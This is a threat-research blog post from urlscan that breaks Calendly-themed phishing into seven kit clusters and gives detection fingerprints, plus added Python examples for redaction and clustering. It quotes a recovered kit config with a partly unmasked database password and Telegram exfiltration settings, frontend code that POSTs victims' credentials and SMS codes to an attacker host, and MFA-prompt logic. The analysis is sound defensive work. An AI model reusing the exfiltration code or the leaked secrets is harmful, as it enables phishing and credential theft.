urlscan.io Blog


Beyond the Lure

Uncovering Distinct Phishing Tooling Behind Calendly-Themed Campaigns

– urlscan Threat Research Team


This is a public version of a report first published as an Intel Report on the urlscan Pro platform. The urlscan Pro version contains a more detailed look into the activity as well as more complex searches to cluster the activity. The urlscan Pro report also benefits from added visibility of Unlisted scans.

Phishing campaigns that impersonate a single brand are often assumed to come from a single source, but that assumption rarely holds up. Calendly is a widely used scheduling platform for booking meetings and interviews, making it a highly believable lure in phishing campaigns.

Calendly-themed phishing shows how one trusted workflow can be abused by multiple, unrelated phishing kits at the same time. While the pages may look similar, the underlying infrastructure and tooling often differ significantly.

Previous reporting from Push Security and Okta Threat Intelligence has highlighted the social engineering side of these campaigns. urlscan analysis shows that behind the shared Calendly branding sits a diverse set of phishing kits, including API-driven frameworks, real-time Socket.IO applications, fake CAPTCHA chains, and Telegram-based exfiltration.

This report breaks these campaigns into distinct technical clusters and provides urlscan fingerprints to help defenders tell them apart, track how the activity evolves, and avoid grouping fundamentally different threats together based on appearance alone.


Cluster 1

This cluster is an API-driven framework in which the frontend pages are powered by external infrastructure that controls logic, victim processing, and configuration.

Screenshot for Cluster 1

Key Technical Characteristics

The cluster is fingerprinted by a combination of a hardcoded query parameter and API endpoint structure, which together provide a stable detection primitive.

Every site needs to contact an API server. At present a total of 9 unique domains have been observed as backend API domains:


The /api/visitors/ endpoint returns enriched metadata about the visitor, including IP address, geolocation, and a blacklisted boolean.

The /api/config/{phishing_domain}/ endpoint returns per-site configuration such as display images, profile names, and branding assets.


Cluster 2

Cluster 2 is another API-backed setup but differs significantly in structure.

API calls are routed through PHP files with more available endpoints.

Screenshot for Cluster 2

Key Technical Characteristics

The cluster can be identified by the API filenames that are called when a page is loaded.

Observed backend domains include:


An exposed directory listing on riftbloom[.]online contained a ZIP archive with the full backend source code, including database credentials, Telegram bot configuration, reCAPTCHA keys, and panel credentials.

Open directory: https://urlscan.io/result/019c0602-e0cb-702d-8358-2aeae38db712

This provided direct insight into the kit’s internal design and confirmed Telegram as the primary exfiltration channel.

The kit contains all of the PHP files that the phishing pages call through the API. The files within the kit are:

  • 2faemail.php
  • authnum.php
  • check.php
  • close_session.php
  • email.php
  • heartbeat.php
  • is_banned.php
  • lastphone.php
  • lastwhatsapp.php
  • login.php
  • otpphone.php
  • otp.php
  • password.php
  • phonenumber.php
  • phone.php
  • recap.php
  • redirectlink.php
  • reset.php
  • result.log
  • start_session.php
  • top-code.php
  • update_status.php
  • whatsapp.php

There is also a config file that lets the controlling actor quickly set up and configure a phishing campaign:

    // Database Configuration
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'rifttvcz_titanfb');
    define('DB_USER', 'rifttvcz_titanfb');
    define('DB_PASS', 'E3[Z$R%Yh&^R');

    // Admin Configuration
    define('ADMIN_USERNAME', 'baba**********');
    define('ADMIN_PASSWORD', 'baba******************');

    // Telegram Configuration
    define('TELEGRAM_TOKEN', '8230169***:AAH4ot**************************');
    define('TELEGRAM_CHAT_ID', '-5059748937');

    // ReCaptcha Configuration
    define('RECAPTCHA_SECRET_KEY', '6LeZX8orAAAAAIoTSrZm21cwf***************');

    // Telegram Notifications
    define('SEND_RECAPTCHA', true);
    define('SEND_EMAIL', true);
    define('SEND_LOGIN', true);
    define('SEND_PHONE', false);
    define('SEND_AUTH', true);
    define('SEND_OTP', true);
    define('SEND_EMAIL_OTP', true);
    define('SEND_WHATSAPP', true);

    try {
      $db = new PDO(
        "mysql:host=" . DB_HOST . ";dbname=" . DB_NAME,
        DB_USER,
        DB_PASS
      );
      $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
      die("Connection failed: " . $e->getMessage());
    }
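When a kit archive like this is recovered, the config file is the quickest source of indicators (Telegram chat ID, backend database, which captured data the operator is notified about), but it also has to be redacted before it can be shared. The following is an added example, not code from the kit or from urlscan: it parses the `define()` constants in the format shown above into a dictionary, lists the enabled `SEND_*` notification channels, and masks any value whose name marks it as a secret. The config embedded in the block is constructed to mirror the structure of the recovered file; every value in it is a placeholder, and the `SECRET_MARKERS` name heuristic is this example's assumption.

```python
"""Added example (not the kit's or urlscan's code): parse and redact a PHP define() config."""
import re

# Matches define('NAME', 'quoted string') or define('NAME', true/false/bare literal).
DEFINE_RE = re.compile(
    r"define\(\s*'([A-Z0-9_]+)'\s*,\s*(?:'((?:[^'\\]|\\.)*)'|([^'\s)]+))\s*\)")
# Constant names containing one of these are treated as secrets (assumption of this example).
SECRET_MARKERS = ("PASS", "TOKEN", "SECRET")


def parse_defines(src):
    """Parse PHP define() calls into a dict; true/false become Python booleans."""
    cfg = {}
    for m in DEFINE_RE.finditer(src):
        name, quoted, bare = m.group(1), m.group(2), m.group(3)
        if quoted is not None:
            cfg[name] = quoted
        elif bare.lower() in ("true", "false"):
            cfg[name] = bare.lower() == "true"
        else:
            cfg[name] = bare
    return cfg


def enabled_notifications(cfg):
    """Captured data types the kit forwards to Telegram (SEND_* flags set to true)."""
    return sorted(k[len("SEND_"):].lower() for k, v in cfg.items()
                  if k.startswith("SEND_") and v is True)


def redact(cfg, keep=4):
    """Mask secret values so the parsed config can be included in a report."""
    out = {}
    for k, v in cfg.items():
        if isinstance(v, str) and any(marker in k for marker in SECRET_MARKERS):
            out[k] = v[:keep] + "*" * max(len(v) - keep, 0)
        else:
            out[k] = v
    return out


def kit_summary(src):
    """Indicators an analyst would pull from the config, with no secrets included."""
    cfg = parse_defines(src)
    return {
        "db": "{}@{}/{}".format(cfg.get("DB_USER"), cfg.get("DB_HOST"), cfg.get("DB_NAME")),
        "telegram_chat_id": cfg.get("TELEGRAM_CHAT_ID"),
        "telegram_token_present": bool(cfg.get("TELEGRAM_TOKEN")),
        "notify_on": enabled_notifications(cfg),
    }


# Constructed config mirroring the recovered file's structure; all values are placeholders.
SAMPLE_CONFIG = r"""
<?php
// Database Configuration
define('DB_HOST', 'localhost');
define('DB_NAME', 'placeholder_db');
define('DB_USER', 'placeholder_user');
define('DB_PASS', 'PLACEHOLDER_DB_PASSWORD');

// Admin Configuration
define('ADMIN_USERNAME', 'placeholder_admin');
define('ADMIN_PASSWORD', 'PLACEHOLDER_ADMIN_PASSWORD');

// Telegram Configuration
define('TELEGRAM_TOKEN', '000000000:PLACEHOLDER_BOT_TOKEN');
define('TELEGRAM_CHAT_ID', '-1000000000000');

// ReCaptcha Configuration
define('RECAPTCHA_SECRET_KEY', 'PLACEHOLDER_RECAPTCHA_SECRET');

// Telegram Notifications
define('SEND_RECAPTCHA', true);
define('SEND_EMAIL', true);
define('SEND_LOGIN', true);
define('SEND_PHONE', false);
define('SEND_AUTH', true);
define('SEND_OTP', true);
define('SEND_EMAIL_OTP', true);
define('SEND_WHATSAPP', true);
"""

if __name__ == "__main__":
    print(kit_summary(SAMPLE_CONFIG))
    print(redact(parse_defines(SAMPLE_CONFIG)))
```

The `SEND_*` flags are worth recording alongside the chat ID: they tell you which captured items (reCAPTCHA pass, e-mail, login, OTP, WhatsApp code) reach the operator in real time, which in turn tells a responder which credentials and codes must be treated as already exposed once a victim has reached that step.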

The backend logic is straightforward and lacks the more advanced anti-analysis techniques seen in other clusters. Despite this, urlscan data shows thousands of scans associated with this kit and over 200 unique hostnames, indicating wide distribution and long-term operational use.

The associated Telegram handle observed in the configuration is nayfercraxx.

Telegram User Profile of 'nayfercraxx'



Cluster 3

Cluster 3 is a smaller but distinct cluster that uses external backend infrastructure together with session-tracking logic.

Each visitor interaction is registered via a session_tracking.php endpoint.

Screenshot for Cluster 3

Key Technical Characteristics

The POST body for session registration is simple and consistent:

{
    "action": "register",
    "current_view": "/test"
}

The server responds with a session ID, confirming backend statefulness.

{
    "success": true,
    "session_id": "sess_16b34b09a54200507c5a578b481a002f",
    "current_view": "/test",
    "message": "Session registered successfully"
}

Observed backend domains seen so far:


All exfiltration and operator notifications are handled via a /telegram_bot.php endpoint hosted on the backend domains. The frontend JavaScript shows direct POST-based interaction with this endpoint, including SMS code forwarding and credential submission.

    try {
      // Form fields sent to the backend: the SMS code action, the session ID issued by
      // session_tracking.php, visitor enrichment and, if already captured, the credentials
      const v = new FormData();
      v.append("action", "send_sms");
      v.append("session_id", ee.sessionId || "no_session");
      v.append("country", L);
      v.append("ip", I);
      if (_) {
        v.append("email", _.email);
        v.append("password", _.password);
      }
      // The backend's telegram_bot.php forwards the submission to the operator's Telegram
      const A = await (await fetch("https://44spark[.]com/telegram_bot.php", {
        method: "POST",
        body: v
      })).json();
      console.log("✅ SMS code sent to Telegram:", A);
    } catch (v) {
      console.error("❌ Error sending SMS code to Telegram:", v);
    }

While smaller in scale, the distinct session handling and Telegram-only exfiltration justify treating this as a separate cluster.


Cluster 4

This cluster leverages Socket.IO to maintain persistent connections between the phishing page and backend infrastructure. Socket.IO is a JavaScript-based communication library that enables real-time, bidirectional messaging between a user’s browser and a backend server. In phishing kits, it is often abused to maintain live control of victim interactions, dynamically advance phishing flows, and exfiltrate data without relying on traditional form submissions.

Screenshot for Cluster 4

Key Technical Characteristics

Within this cluster, multiple sub-patterns exist.

Some deployments use a Browser-in-the-Browser (BitB) technique, where users are presented with a fake embedded browser window requesting Facebook credentials after selecting a meeting slot. Other variants use a full-page phishing flow while still relying on Socket.IO for backend communication.

Calendly page: https://urlscan.io/result/019c28c6-01a1-774a-a07c-07fced54fb6f

Phishing page: https://urlscan.io/result/019c28c5-d848-73ca-936b-75cb1cc8f94e

Screenshot for Cluster 4

A sample of the socket connection configuration can be seen in the DOM:

__sveltekit_10x4gmz = {
   base: new URL(".", location).pathname.slice(0, -1),
   env: {"PUBLIC_SOCKET_URL":"https://tytsrv.onrender[.]com"}
};

Cluster 5

The first Fake CAPTCHA Kit cluster relies on self-service hosting platforms, primarily vercel.app and herokuapp.com, which allow threat actors to deploy phishing pages without managing servers or domains.

The pages present a fake Cloudflare CAPTCHA that serves no functional purpose.

Screenshot for Cluster 5

Key Technical Characteristics

Landing page: https://urlscan.io/result/019c09fa-f9b9-758f-b8b7-b112eea05b3a

After the CAPTCHA step, victims are redirected into BitB-style phishing flows with support for multiple MFA methods, including authenticator apps, WhatsApp, SMS, and email.

Backend exfiltration occurs only after credential submission and therefore does not appear in initial HTTP requests.

Below is an excerpt of the backend JavaScript which runs the pages in this cluster. We have excluded some content for brevity and readability:

    // Heading shown while the victim waits for the selected second factor
    const Fe = () => {
      if (S.includes("auth")) {
        return "Go to your authentication app";
      }
      if (S.includes("whatsapp")) {
        return "Check your Whatsapp";
      }
      if (S.includes("phone")) {
        return "Check your text messages";
      }
      if (S.includes("email")) {
        return "Check your e-mail";
      }
      // [...]
    };

    // Instruction text for the code prompt
    const X = () => {
      if (S.includes("auth")) {
        return "Enter the 6-digit code for this account from the two-factor authentication app you set up (such as Duo Mobile or Google Authenticator).";
      }
      if (S.includes("whatsapp")) {
        return "Enter the code that we sent to your whatsapp.";
      }
      if (S.includes("phone")) {
        return "Enter the code that we sent to your phone number.";
      }
      if (S.includes("email")) {
        return "Enter the code we sent to your email.";
      }
      // [...]
    };

    // [...] Illustration selected for the MFA method
    if (S.includes("auth")) {
      return "/assets/2fa-YwJricY1.svg";
    }
    if (S.includes("whatsapp")) {
      return "/assets/2fa-whatsapp.jpg";
    }
    if (S.includes("phone") || S.includes("email")) {
      return "/assets/2fa-phone-CEstYOjU.svg";
    }

    // [...] Code submission handler and its input validation
    const et = async () => {
      ye("Please enter your code to continue.");
      // [...]
    }
    if (ae.length !== 6 && ae.length !== 8) {
      ye("Your code must be 6 or 8 digits. Please check and try again.");
    }
    // [...] Each MFA method has a matching "_wrong" state used to re-prompt the victim
    switch (S) {
      case "2fa_auth":
      case "2fa_auth_wrong":
      case "2fa_whatsapp":
      case "2fa_whatsapp_wrong":
      case "2fa_phone":
      case "2fa_phone_wrong":
      case "2fa_email":
      case "2fa_email_wrong":
      // [...]
    }

Cluster 6

The second Fake CAPTCHA Kit cluster shares visual and narrative similarities with the previous Fake CAPTCHA Kit cluster but introduces an external API to control flow logic and filtering.

Screenshot for Cluster 6

Key Technical Characteristics

Example POST requests include structured scheduling metadata, while responses contain IP enrichment tokens, blocked email domains, and country-based IP filtering.

Observed backend domains include:


Notably, this cluster also contains pages that lack the Calendly theming but are still linked to the same backend phishing kit, showing how kits are updated and rebranded over time.



Cluster 7

Cluster 7 is the final cluster and is characterized by direct communication with the Telegram Bot API for exfiltration, without intermediary backend infrastructure.

An example scan within this cluster is a Red Bull-themed site hosted on amplifyapp[.]com - https://urlscan.io/result/019bda23-646d-7469-8c19-ab320681e885

Screenshot for Cluster 7

While Calendly-themed instances exist, the same tooling has been observed across multiple brands including Nike, Red Bull, Puma, and Zara, suggesting a reusable job-scam framework.


Expanding Beyond Known Clusters

These clusters do not represent the full visibility of Calendly-themed phishing. New kits continue to emerge, and existing ones evolve. To identify previously unseen tooling, analysts can construct a negative search that excludes the known clusters while still hunting for Calendly-themed sites, surfacing candidates for new clusters:

This approach allows analysts to surface outliers, which can then be pivoted into new clusters through iterative fingerprinting.
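The report's central point is that the durable signal is the tooling, not the brand, and that a negative search over the known fingerprints surfaces the outliers. The following is an added example, not urlscan's code or search syntax: it encodes the fingerprints described above for Cluster 1 (external `/api/visitors/` and `/api/config/` endpoints), Cluster 2 (the kit's PHP API filenames), Cluster 3 (`session_tracking.php` with `telegram_bot.php`), Cluster 4 (`PUBLIC_SOCKET_URL` in the DOM) and Cluster 7 (direct calls to the Telegram Bot API) as rules over a simplified scan record, then runs the negative search: Calendly-themed scans that match no rule. Clusters 5 and 6 are omitted because the report does not give a request-level fingerprint for them. The scan records, hostnames and the `/socket.io/` path check are constructed for illustration; the two-filename threshold for Cluster 2 is this example's design choice.

```python
"""Added example (not urlscan's code): tooling-fingerprint clustering of scan records."""
from collections import Counter
from posixpath import basename
from urllib.parse import urlparse

# PHP API filenames from the recovered Cluster 2 kit, as listed in the report.
CLUSTER2_PHP = {
    "2faemail.php", "authnum.php", "check.php", "close_session.php", "email.php",
    "heartbeat.php", "is_banned.php", "lastphone.php", "lastwhatsapp.php",
    "login.php", "otpphone.php", "otp.php", "password.php", "phonenumber.php",
    "phone.php", "recap.php", "redirectlink.php", "reset.php", "start_session.php",
    "top-code.php", "update_status.php", "whatsapp.php",
}


def classify(scan):
    """Return (cluster label, evidence) for one simplified scan record.

    scan: {"id", "page_url", "title", "dom", "requests": [request URLs]}.
    Rules run from the most specific fingerprint to the least specific one.
    """
    page_host = urlparse(scan["page_url"]).netloc
    reqs = [urlparse(u) for u in scan["requests"]]

    # Cluster 7: the page calls the Telegram Bot API itself, no intermediary backend.
    for p in reqs:
        if p.netloc == "api.telegram.org" and p.path.startswith("/bot"):
            return "cluster7", "direct Telegram Bot API call"

    # Cluster 3: visitor sessions registered through session_tracking.php, with
    # telegram_bot.php on the same backend domains handling exfiltration.
    backends = {p.netloc for p in reqs
                if p.path.endswith(("/session_tracking.php", "/telegram_bot.php"))}
    if any(p.path.endswith("/session_tracking.php") for p in reqs):
        return "cluster3", "session_tracking.php on " + ", ".join(sorted(backends))

    # Cluster 1: an external API server exposing /api/visitors/ and /api/config/<domain>/.
    for p in reqs:
        if p.netloc != page_host and p.path.startswith(("/api/visitors/", "/api/config/")):
            return "cluster1", "API backend " + p.netloc

    # Cluster 2: API calls routed through the kit's PHP files. Two distinct filenames are
    # required so that a lone generic login.php on an unrelated site does not match.
    php = {basename(p.path) for p in reqs} & CLUSTER2_PHP
    if len(php) >= 2:
        return "cluster2", "PHP API files " + ", ".join(sorted(php))

    # Cluster 4: SvelteKit env block exposing PUBLIC_SOCKET_URL in the DOM, or traffic on
    # Socket.IO's default /socket.io/ path (the path check is this example's assumption).
    if "PUBLIC_SOCKET_URL" in scan.get("dom", "") or any(
            p.path.startswith("/socket.io/") for p in reqs):
        return "cluster4", "Socket.IO backend"

    return "unclustered", "no known tooling fingerprint"


def is_calendly_themed(scan):
    """Brand theming is judged from page title and DOM text, independently of tooling."""
    return "calendly" in (scan.get("title", "") + " " + scan.get("dom", "")).lower()


def hunt_outliers(scans):
    """The report's negative search: Calendly-themed scans matching no known cluster."""
    return [s["id"] for s in scans
            if is_calendly_themed(s) and classify(s)[0] == "unclustered"]


def summarize(scans):
    """Count scans per cluster label."""
    return dict(Counter(classify(s)[0] for s in scans))


def _scan(sid, page_url, title, requests, dom=""):
    return {"id": sid, "page_url": page_url, "title": title,
            "requests": [page_url] + requests, "dom": dom}


# Constructed scan records; every hostname below is a placeholder, not an observed IoC.
SAMPLE_SCANS = [
    _scan("s1", "https://book-a-slot.example/", "Calendly - Schedule a call",
          ["https://api-backend.example/api/visitors/",
           "https://api-backend.example/api/config/book-a-slot.example/"]),
    _scan("s2", "https://meet-times.example/", "Calendly",
          ["https://kit-backend.example/api/start_session.php",
           "https://kit-backend.example/api/recap.php",
           "https://kit-backend.example/api/heartbeat.php"]),
    _scan("s3", "https://calendar-invite.example/", "Calendly",
          ["https://backend3.example/session_tracking.php",
           "https://backend3.example/telegram_bot.php"]),
    _scan("s4", "https://pick-a-time.example/", "Calendly", [],
          dom='__sveltekit_abc = {env: {"PUBLIC_SOCKET_URL":"https://sock.example"}};'),
    _scan("s5", "https://jobs-portal.example/", "Careers",
          ["https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage"]),
    _scan("s6", "https://new-kit.example/", "Calendly - Book me",
          ["https://cdn.example/app.js"]),
    _scan("s7", "https://intranet.example/", "Calendly link",
          ["https://intranet.example/login.php"]),
]

if __name__ == "__main__":
    for s in SAMPLE_SCANS:
        print(s["id"], *classify(s))
    print("outliers for further fingerprinting:", hunt_outliers(SAMPLE_SCANS))
```

Rule order matters: Cluster 3 also talks to a `telegram_bot.php`, and Cluster 2 includes generic names such as `login.php`, so the more specific fingerprints are tested first and the PHP-filename rule needs two hits before it fires. The two unclustered Calendly-themed records are exactly what the negative search is meant to surface; the next step is to inspect their requests and DOM for a new shared fingerprint.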


Conclusion

Calendly phishing demonstrates a broader pattern increasingly visible across brand abuse: thematic consistency does not imply technical uniformity. By dissecting campaigns into infrastructure and logic-based clusters, analysts gain clearer insight into threat actor tooling, reuse patterns, and operational scale.

The key takeaway is simple but critical: clustering by brand alone is not sufficient. Tooling fingerprints, backend logic, and communication paths provide the durable signals needed to track and disrupt modern phishing ecosystems.


Further reading

For other resources on the same campaigns, see the following intelligence reports published by other companies:

More on urlscan Pro

If you want to learn about the urlscan Pro platform and how it might be valuable for your organization feel free to reach out to us! We offer free trials with no strings attached. We would be happy to give you a passionate demo of what our platform can do for you. Reach out to us at sales@urlscan.io.